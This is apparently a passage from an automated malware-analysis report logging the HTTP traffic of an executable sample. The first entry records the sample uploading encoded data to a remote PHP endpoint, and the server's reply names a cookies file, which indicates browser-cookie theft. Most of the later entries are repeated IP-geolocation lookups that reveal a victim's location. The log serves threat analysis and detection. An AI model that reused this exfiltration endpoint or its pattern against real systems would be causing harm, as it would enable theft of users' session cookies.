                                                                                                                      Nov 10, 2024 21:44:19.331846952 CET144OUTPOST /swsk/P4.php HTTP/1.1
                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                      Host: sws.swpushroller.eu
                                                                                                                      Content-Length: 9112
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 10, 2024 21:44:19.336585999 CET9112OUTData Raw: 4d 6e 47 6e 55 56 75 34 59 54 57 4a 71 79 74 43 35 39 74 72 48 48 61 72 7a 6d 45 38 41 4a 70 57 77 52 35 4a 6a 59 49 44 2b 77 79 50 62 61 64 44 6e 68 36 78 38 66 5a 6f 44 46 6f 68 6c 35 58 47 63 52 59 48 62 76 2b 34 6a 65 35 64 32 6e 64 56 69 47
                                                                                                                      Data Ascii: MnGnUVu4YTWJqytC59trHHarzmE8AJpWwR5JjYID+wyPbadDnh6x8fZoDFohl5XGcRYHbv+4je5d2ndViG2BFKerW3sI0y1Gthg0A2QuNb5q5/8C/l9rT4N36/gRl6xaxh/S1zo2PPY/WFA/p+6lOmKeS8X5HxPBMhkGdwkrchFN/U/2PZOP9QBzF+P3ktKaI+I9Ve1PtAjEtBU9pk6rko0aoJhdm6XAIUikoT0YdaDRQR4sS+l
                                                                                                                      Nov 10, 2024 21:44:20.200763941 CET250INHTTP/1.1 201 Created
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      content-length: 86
                                                                                                                      date: Sun, 10 Nov 2024 20:44:20 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      connection: Keep-Alive
                                                                                                                      Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 44 61 74 61 20 75 70 6c 6f 61 64 65 64 20 61 6e 64 20 64 65 63 72 79 70 74 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 5f 37 34 39 39 2e 74 78 74 22 7d
                                                                                                                      Data Ascii: {"message":"Data uploaded and decrypted successfully.","file_name":"Cookies_7499.txt"}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.449731188.114.97.34437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-10 20:43:58 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-10 20:43:58 UTC846INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:43:58 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 359
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 51643
                                                                                                                      Last-Modified: Sun, 10 Nov 2024 06:23:15 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TS6J6O6BPrOI58pDUw3VENTyphIBE%2BcaH4h0CNocybNcELRLQgn9PdqwRucvRTiITbttBQ1gHeOpGID5kUYgSJEEdY47KrckEn4JmRUqxSEig9NQ05jeUeONx5oEDBwv47ufzseh"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e08e0bb3d202e5a-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1406&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2004152&cwnd=246&unsent_bytes=0&cid=e51cc0d41810ae52&ts=408&x=0"
                                                                                                                      2024-11-10 20:43:58 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                      Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.449732188.114.97.34437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-10 20:43:59 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-10 20:43:59 UTC852INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:43:59 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 359
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 51644
                                                                                                                      Last-Modified: Sun, 10 Nov 2024 06:23:15 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b9Eh9PRF4WUICePxPAKi8yHAXr%2Fl4MFxgPCPeGJ8PzogW7acTTHSHyd2o3cF0uDcsn62ZH6d%2BNYhwv1s%2ByAerPEx%2BJ0JN0OkyKnyrftujCu6qmHKvFKMz5aL8xcNPX71xraBWzA1"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e08e0c29fc4e762-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2264&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1283687&cwnd=222&unsent_bytes=0&cid=3b6cfeac6da889ab&ts=167&x=0"
                                                                                                                      2024-11-10 20:43:59 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                      Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.449734188.114.97.34437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-10 20:44:01 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-10 20:44:01 UTC854INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:01 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 359
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 51646
                                                                                                                      Last-Modified: Sun, 10 Nov 2024 06:23:15 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BDa8SgtKT80DA1lgH%2FVDhW0JEOTgkUuOG6ewHWL5cT0jZe0dFe9AK%2BLh%2Bk0VMEHoB74YNts9A6jh4IUfhx%2ByGwS0okaBRU6S49QeWpw%2FDVMdyPNjBWBYAC8zweH8B8NANJi6isef"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e08e0ccdbabb793-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2020&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1261873&cwnd=121&unsent_bytes=0&cid=00260cdda65ee895&ts=172&x=0"
                                                                                                                      2024-11-10 20:44:01 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                      Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.449736188.114.97.34437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-10 20:44:02 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-10 20:44:03 UTC854INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:03 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 359
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 51648
                                                                                                                      Last-Modified: Sun, 10 Nov 2024 06:23:15 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kWc8ap8zvVBdmkb7k4S7zIVt8FJadT0GkbxeYk13d6igXcwrN%2FidGDjHgFKmSy%2FPkV8JjGuE9PhIWV39PV6QxBocUi6Kcuje20XjJrjs6oER%2Fx%2F9Qm4bNiQfPq9twP8yWQ1z7%2BXy"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e08e0d72cab2883-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2285&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1800995&cwnd=250&unsent_bytes=0&cid=02be879e580afa70&ts=159&x=0"
                                                                                                                      2024-11-10 20:44:03 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                      Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.449738188.114.97.34437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-10 20:44:04 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-10 20:44:04 UTC854INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:04 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 359
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 51649
                                                                                                                      Last-Modified: Sun, 10 Nov 2024 06:23:15 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNPlxk5ewWCA%2FVBUM1I5pmdKJE89LKuIEUDRbXhsQiqvbJMkPg8YUCPbUZC3%2BubFCN3mJ5nLuObrs3nAryFEerFFggT8YiTnTii28fsGCUzifwNp6T92%2Fqf3fZO9d0yXAveQJ%2F%2Ft"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e08e0e14ba56ba1-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1216&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1427304&cwnd=251&unsent_bytes=0&cid=708538c7a02aabd0&ts=153&x=0"
                                                                                                                      2024-11-10 20:44:04 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                      Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.449740188.114.97.34437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-10 20:44:06 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-10 20:44:06 UTC850INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:06 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 359
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 51651
                                                                                                                      Last-Modified: Sun, 10 Nov 2024 06:23:15 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fvaPyUoKObkS0SJVtyGDusmJzMPHEcQp647mGt8EupyibGzoq1E7TszhofzYBvECqhQXkvo1y77cr7EHkEgrnYQ%2BTlSXo1MmLqnKT%2BoEN3XzCoLYyx%2BgebSyHWTVkhUyExFO9Trn"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e08e0eb8b7d2ff0-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1722&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1843411&cwnd=239&unsent_bytes=0&cid=8f082b561e8b5f22&ts=151&x=0"
                                                                                                                      2024-11-10 20:44:06 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                      Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.449742188.114.97.34437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-10 20:44:07 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-10 20:44:07 UTC856INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:07 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 359
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 51652
                                                                                                                      Last-Modified: Sun, 10 Nov 2024 06:23:15 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2Bfs7Ltpy3ufC%2FZhGTnzBn%2B0OhIT%2FCDc%2BYwBLgJ3OrDcmiooRDxOJ%2FLrwaXXRGdLbJOtsZJG8gJEJZXTQm2aGsZcGKYorrkUwxdekG6iRrFibEBriLGG9TI2w9LRpqS8iy4cXuth"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e08e0f58d11e5bd-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1249&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2291139&cwnd=237&unsent_bytes=0&cid=0d00a98c6ceb187a&ts=158&x=0"
                                                                                                                      2024-11-10 20:44:07 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                      Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.449744188.114.97.34437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-10 20:44:09 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-10 20:44:09 UTC850INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:09 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 359
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 51654
                                                                                                                      Last-Modified: Sun, 10 Nov 2024 06:23:15 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oD4pBnwYiiJMUXnKgHyzq2zV1XRemPZPOEm%2BOHO0kp9AgkriMnDQPEytcRcwCjFuWe7EOL3aP4FB3jb8xYYHBsfhGyI0YJy8t4JJXT2naygoPp0M%2BXZMFdQQzEjCvdFmNuPm%2Fngy"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e08e0ffc96a4780-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2350649&cwnd=250&unsent_bytes=0&cid=5cf184c6e9868291&ts=163&x=0"
                                                                                                                      2024-11-10 20:44:09 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                      Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.449746188.114.97.34437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
